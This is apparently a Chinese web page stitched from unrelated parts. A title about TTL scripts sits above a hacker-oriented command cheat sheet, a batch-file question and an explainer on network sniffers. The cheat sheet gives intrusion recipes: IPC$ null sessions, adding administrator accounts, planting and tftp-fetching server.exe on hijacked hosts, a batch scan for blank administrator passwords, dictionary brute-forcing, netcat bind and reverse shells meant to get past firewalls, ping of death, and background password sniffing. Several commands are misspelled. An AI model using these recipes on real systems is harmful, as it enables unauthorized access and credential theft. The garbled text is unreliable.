ttl腳本語音

⑴ 計算機命令

進入注冊表該用 regedit

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )
print 文件名 列印文本文件

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）??針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

MYsql 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

Linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯c語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0?%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2?%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1}

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{(set)為增量形式時}；/F 指從文件中不斷取值，直到取完為止{(set)為文件時，如(d:\pass.txt)時}。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。

2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -a

⑵ 一個批處理的問題。

以網路為例

@echo off
for /f "skip=7 delims=" %%a in ('ping www..com') do echo %%a
pause

⑶ sniffer狀態

sniffer是竊聽的意思
應該就是竊聽狀態

sniffers(嗅探器)幾乎和internet有一樣久的歷史了.Sniffer是一種常用的收集有用數據方法，這些數據可以是用戶的帳號和密碼，可以是一些商用機密數據等等。隨著Internet及電子商務的日益普及,Internet的安全也越來越受到重視。在Internet安全隱患中扮演重要角色之一的Sniffer以受到越來越大的關注，所以今天我要向大家介紹一下介紹Sniffer以及如何阻止sniffer。
大多數的黑客僅僅為了探測內部網上的主機並取得控制權，只有那些"雄心勃勃"的黑客，為了控制整個網路才會安裝特洛伊木馬和後門程序，並清除記錄。他們經常使用的手法是安裝sniffer。
在內部網上，黑客要想迅速獲得大量的賬號（包括用戶名和密碼），最為有效的手段是使用 "sniffer" 程序。這種方法要求運行Sniffer 程序的主機和被監聽的主機必須在同一個乙太網段上，故而在外部主機上運行sniffer是沒有效果的。再者，必須以root的身份使用sniffer 程序，才能夠監聽到乙太網段上的數據流。談到乙太網sniffer，就必須談到乙太網sniffing。
那麼什麼是乙太網sniffer呢?
乙太網sniffing是指對乙太網設備上傳送的數據包進行偵聽，發現感興趣的包。如果發現符合條件的包，就把它存到一個log文件中
去。通常設置的這些條件是包含字"username"或"password"的包。它的目的是將網路層放到promiscuous模式，從而能幹些事情。
Promiscuous模式是指網路上的所有設備都對匯流排上傳送的數據進行偵聽，並不僅僅是它們自己的數據。根據第二章中有關對乙太網的工作原理的基本介紹，可以知道：一個設備要向某一目標發送數據時,它是對乙太網進行廣播的。一個連到乙太網匯流排上的設備在任何時間里都在接受數據。不過只是將屬於自己的數據傳給該計算機上的應用程序。
利用這一點，可以將一台計算機的網路連接設置為接受所有以太
網匯流排上的數據，從而實現sniffer。
sniffer通常運行在路由器，或有路由器功能的主機上。這樣就能對大量的數據進行監控。sniffer屬第二層次的攻擊。通常是攻擊者已經進入了目標系統，然後使用sniffer這種攻擊手段，以便得到更多的信息。
sniffer除了能得到口令或用戶名外，還能得到更多的其他信息，比如一個其他重要的信息，在網上傳送的金融信息等等。sniffer幾乎能得到任何乙太網上的傳送的數據包。黑客會使用各種方法，獲得系統的控制權並留下再次侵入的後門，以保證sniffer能夠執行。在Solaris 2.x平台上，sniffer 程序通常被安裝在/usr/bin 或/dev目錄下。黑客還會巧妙的修改時間，使得sniffer程序看上去是和其它系統程序同時安裝的。
大多數乙太網sniffer程序在後台運行，將結果輸出到某個記錄文件中。黑客常常會修改ps程序，使得系統管理員很難發現運行的sniffer程序。
乙太網sniffer程序將系統的網路介面設定為混合模式。這樣，它就可以監聽到所有流經同一乙太網網段的數據包，不管它的接受者或發送者是不是運行sniffer的主機。 程序將用戶名、密碼和其它黑客感興趣的數據存入log文件。黑客會等待一段時間 ----- 比如一周後，再回到這里下載記錄文件。
講了這么多，那麼到底我們可以用什麼通俗的話來介紹sniffer呢？
計算機網路與電話電路不同，計算機網路是共享通訊通道的。共享意味著計算機能夠接收到發送給其它計算機的信息。捕獲在網路中傳輸的數據信息就稱為sniffing（竊聽）。
乙太網是現在應用最廣泛的計算機連網方式。乙太網協議是在同一迴路向所有主機發送數據包信息。數據包頭包含有目標主機的正確地址。一般情況下只有具有該地址的主機會接受這個數據包。如果一台主機能夠接收所有數據包，而不理會數據包頭內容，這種方式通常稱為"混雜" 模式。
由於在一個普通的網路環境中，帳號和口令信息以明文方式在乙太網中傳輸， 一旦入侵者獲得其中一台主機的root許可權，並將其置於混雜模式以竊聽網路數據，從而有可能入侵網路中的所有計算機。
一句話，sniffer就是一個用來竊聽的黑客手段和工具。
二、sniffer的工作原理
通常在同一個網段的所有網路介面都有訪問在物理媒體上傳輸的所有數據的能力，而每個網路介面都還應該有一個硬體地址，該硬體地址不同於網路中存在的其他網路介面的硬體地址，同時，每個網路至少還要一個廣播地址。（代表所有的介面地址），在正常情況下，一個合法的網路介面應該只響應這樣的兩種數據幀：
1、幀的目標區域具有和本地網路介面相匹配的硬體地址。
2、幀的目標區域具有"廣播地址"。
在接受到上面兩種情況的數據包時，nc通過cpu產生一個硬體中斷，該中斷能引起操作系統注意，然後將幀中所包含的數據傳送給系統進一步處理。
而sniffer就是一種能將本地nc狀態設成（promiscuous）狀態的軟體，當nc處於這種"混雜"方式時，該nc具備"廣播地址"，它對所有遭遇到的每一個幀都產生一個硬體中斷以便提醒操作系統處理流經該物理媒體上的每一個報文包。（絕大多數的nc具備置成 promiscuous方式的能力）
可見，sniffer工作在網路環境中的底層，它會攔截所有的正在網路上傳送的數據，並且通過相應的軟體處理，可以實時分析這些數據的內容，進而分析所處的網路狀態和整體布局。值得注意的是：sniffer是極其安靜的，它是一種消極的安全攻擊。
通常sniffer所要關心的內容可以分成這樣幾類：
1、口令
我想這是絕大多數非法使用sniffer的理由，sniffer可以記錄到明文傳送的userid和passwd.就算你在網路傳送過程中使用了加密的數據，sniffer記錄的數據一樣有可能使入侵者在家裡邊吃肉串邊想辦法算出你的演算法。
2、金融帳號
許多用戶很放心在網上使用自己的信用卡或現金帳號，然而sniffer可以很輕松截獲在網上傳送的用戶姓名、口令、信用卡號碼、截止日期、帳號和pin.
3、偷窺機密或敏感的信息數據
通過攔截數據包，入侵者可以很方便記錄別人之間敏感的信息傳送，或者乾脆攔截整個的email會話過程。
4、窺探低級的協議信息。
這是很可怕的事，我認為，通過對底層的信息協議記錄，比如記錄兩台主機之間的網路介面地址、遠程網路介面ip地址、ip路由信息和tcp連接的位元組順序號碼等。這些信息由非法入侵的人掌握後將對網路安全構成極大的危害，通常有人用sniffer收集這些信息只有一個原因：他正在進行一次欺詐，（通常的ip地址欺詐就要求你准確插入tcp連接的位元組順序號,這將在以後整理的文章中指出）如果某人很關心這個問題，那麼sniffer對他來說只是前奏，今後的問題要大得多。（對於高級的hacker而言，我想這是使用sniffer的唯一理由吧）
二.sniffer的工作環境
snifffer就是能夠捕獲網路報文的設備。嗅探器的正當用處在於分析網路的流量,以便找出所關心的網路中潛在的問題。例如,假設網路的某一段運行得不是很好,報文的發送比較慢,而我們又不知道問題出在什麼地方,此時就可以用嗅探器來作出精確的問題判斷。
嗅探器在功能和設計方面有很多不同。有些只能分析一種協議，而另一些可能能夠分析幾百種協議。一般情況下，大多數的嗅探器至少能夠分析下面的協議：
1.標准乙太網
2.TCP/IP
3.IPX
4.DECNet
嗅探器通常是軟硬體的結合。專用的嗅探器價格非常昂貴。另一方面，免費的嗅探器雖然不需要花什麼錢，但得不到什麼支持。
嗅探器與一般的鍵盤捕獲程序不同。鍵盤捕獲程序捕獲在終端上輸入的鍵值，而嗅探器則捕獲真實的網路報文。嗅探器通過將其置身於網路介面來達到這個目的——例如將乙太網卡設置成雜收模式。（為了理解雜收模式是怎麼回事，先解釋區域網是怎麼工作的）。
數據在網路上是以很小的稱為幀(Ftame)的單位傳輸的幀由好幾部分組成，不同的部分執行不同的功能。（例如，乙太網的前12個位元組存放的是源和目的的地址，這些位告訴網路：數據的來源和去處。乙太網幀的其他部分存放實際的用戶數據、TCP/IP的報文頭或IPX報文頭等等）。
幀通過特定的稱為網路驅動程序的軟體進行成型，然後通過網卡發送到網線上。通過網線到達它們的目的機器，在目的機器的一端執行相反的過程。接收端機器的乙太網卡捕獲到這些幀，並告訴操作系統幀的到達，然後對其進行存儲。就是在這個傳輸和接收的過程中，嗅探器會造成安全方面的問題。
